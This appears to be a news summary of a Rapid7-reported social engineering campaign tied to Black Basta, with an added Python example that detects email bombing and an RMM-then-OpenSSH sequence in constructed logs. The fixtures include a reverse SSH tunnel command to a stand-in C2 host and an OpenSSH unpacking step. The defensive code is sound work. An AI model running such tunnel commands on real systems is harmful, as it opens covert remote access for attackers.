Cybersecurity researchers at Rapid7 identified a social engineering campaign targeting enterprises with spam emails to gain initial access for further exploitation, The Hacker News reports.
The main version of the ongoing campaign, which has been active since late April 2024, overwhelms users with legitimate newsletter sign-up confirmations to bypass email protection systems. The threat actors then impersonate the company's IT team, contacting users by phone to persuade them to install remote monitoring and management (RMM) software such as AnyDesk or Microsoft's Quick Assist. Once remote access is established, the attackers execute batch scripts that download additional payloads, including OpenSSH for Windows, which they use to open a reverse shell to their command-and-control server. The campaign also attempts to deploy Cobalt Strike beacons, although one observed attempt failed.
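From the defender's side, the two stages described above leave distinct traces: a burst of sign-up confirmations hitting one mailbox, and, on the endpoint, an RMM client start followed shortly by a batch-driven OpenSSH download or `ssh.exe` launch. The following Python is an added example, not code from Rapid7 or The Hacker News; it runs both checks over constructed log records. The record layouts, the list of RMM image names, the window lengths and the threshold are all assumptions to be tuned against real telemetry.

```python
"""Added example: two small detectors for the campaign stages described in the
article, run over constructed sample records. Field layouts, image names,
thresholds and windows are assumptions, not values from the article."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# ---- Stage 1: mailbox flooded with newsletter sign-up confirmations ----------
# Constructed mail-gateway records: (iso_timestamp, recipient, subject).
MAIL_LOG = [
    # 25 confirmations to alice inside four minutes (constructed flood)
    (f"2024-05-02T09:{i // 6:02d}:{(i % 6) * 10:02d}", "alice@example.test",
     f"Confirm your subscription to list #{i}")
    for i in range(25)
] + [
    ("2024-05-02T09:01:00", "bob@example.test", "Welcome to our newsletter"),
    ("2024-05-02T09:30:00", "bob@example.test", "Verify your email address"),
    ("2024-05-02T09:02:00", "alice@example.test", "Q2 budget review"),  # normal mail
]

# Subject fragments typical of sign-up confirmations (assumed list).
SIGNUP_MARKERS = ("confirm your subscription", "verify your email",
                  "welcome to our newsletter")


def detect_email_bomb(records, threshold=20, window=timedelta(minutes=10)):
    """Return recipients who got >= threshold sign-up confirmations within
    any sliding window of the given length."""
    recent = defaultdict(deque)  # recipient -> timestamps inside the window
    flagged = set()
    for ts, rcpt, subject in sorted(records):
        if not any(m in subject.lower() for m in SIGNUP_MARKERS):
            continue
        t = datetime.fromisoformat(ts)
        q = recent[rcpt]
        q.append(t)
        while q and t - q[0] > window:   # drop timestamps that aged out
            q.popleft()
        if len(q) >= threshold:
            flagged.add(rcpt)
    return flagged


# ---- Stage 2: RMM client followed by batch-driven OpenSSH activity ----------
# Constructed process-creation records:
# (iso_timestamp, host, parent_image, image, command_line)
PROCESS_EVENTS = [
    ("2024-05-02T10:00:00", "WS01", r"C:\Windows\explorer.exe",
     r"C:\Users\alice\Downloads\AnyDesk.exe", "AnyDesk.exe"),
    ("2024-05-02T10:20:00", "WS01", r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -c Expand-Archive OpenSSH-Win64.zip C:\\OpenSSH"),
    ("2024-05-02T10:25:00", "WS01", r"C:\Windows\System32\cmd.exe",
     r"C:\OpenSSH\ssh.exe", "ssh.exe -N -R 8022:127.0.0.1:22 user@c2.placeholder.test"),
    # Admin using ssh from a shell with no RMM client on the host: benign
    ("2024-05-02T11:00:00", "WS02", r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\OpenSSH\ssh.exe", "ssh.exe jumpbox.example.test"),
    # RMM client two hours before ssh: outside the correlation window
    ("2024-05-02T08:00:00", "WS03", r"C:\Windows\explorer.exe",
     r"C:\Program Files\AnyDesk\AnyDesk.exe", "AnyDesk.exe"),
    ("2024-05-02T10:00:00", "WS03", r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\OpenSSH\ssh.exe", "ssh.exe build.example.test"),
]

# Image names of the tools the article names (assumed file names;
# client32.exe is the usual NetSupport client binary).
RMM_IMAGES = {"anydesk.exe", "quickassist.exe",
              "screenconnect.clientservice.exe", "client32.exe"}
SSH_IMAGES = {"ssh.exe", "sshd.exe"}


def detect_rmm_to_ssh(events, window=timedelta(hours=1)):
    """Flag OpenSSH-related processes launched from cmd.exe (batch script)
    within `window` after an RMM client started on the same host."""
    last_rmm = {}   # host -> time of most recent RMM client start
    hits = []
    for ts, host, parent, image, cmdline in sorted(events):
        t = datetime.fromisoformat(ts)
        img = image.rsplit("\\", 1)[-1].lower()
        if img in RMM_IMAGES:
            last_rmm[host] = t
            continue
        ssh_like = img in SSH_IMAGES or "openssh" in cmdline.lower()
        from_batch = parent.lower().endswith("cmd.exe")
        if ssh_like and from_batch and host in last_rmm \
                and t - last_rmm[host] <= window:
            hits.append((host, img, cmdline))
    return hits


if __name__ == "__main__":
    print("email bomb:", detect_email_bomb(MAIL_LOG))
    for hit in detect_rmm_to_ssh(PROCESS_EVENTS):
        print("rmm->ssh:", hit)
```

The second detector deliberately keys on the parent being `cmd.exe`, matching the batch-script step in the article; an environment where administrators legitimately script SSH from batch files would need the RMM-first correlation tightened (for example, to RMM binaries run from user-writable paths) rather than the SSH condition loosened.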
This activity shows overlap with tactics previously associated with Black Basta ransomware operators. The campaign has also utilized remote monitoring tools such as ConnectWise ScreenConnect and the NetSupport RAT, a remote access trojan linked to FIN7, a cybercriminal group with connections to Black Basta.